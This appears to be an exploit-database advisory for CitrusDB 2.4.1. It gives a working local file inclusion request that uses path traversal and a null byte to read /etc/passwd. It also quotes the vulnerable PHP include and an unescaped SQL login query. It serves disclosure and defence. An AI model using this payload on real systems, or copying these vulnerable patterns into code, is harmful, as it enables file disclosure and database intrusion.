CitrusDB 2.4.1 Local File Inclusion / SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047703 漏洞类型
发布时间 2012-04-12 更新时间 2012-04-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012040098
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
CitrusDB 2.4.1 - LFI/SQLi Vulnerability
Author: Michal `wacky` Blaszczak 
WWW: blaszczakm.blogspot.com


CitrusDB is an open source customer service and billing database.
It can be used by customer service personnel to provide sales and support to customers, 
and by billing staff to bill customers for their services via invoices and credit card batches. 
Customers may access the Online customer account manager to view their services, billing history,
and make service and support requests online.

1) LFI
http://192.168.51.8/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base

index.php:315

    $filepath = "$path_to_citrus/$load.php";
                if (file_exists($filepath)) {
                        include('./'.$load.'.php');


2) SQL INJECTION

include/user.class.php:134

$sql="SELECT password FROM user WHERE username='$user_name' LIMIT 1";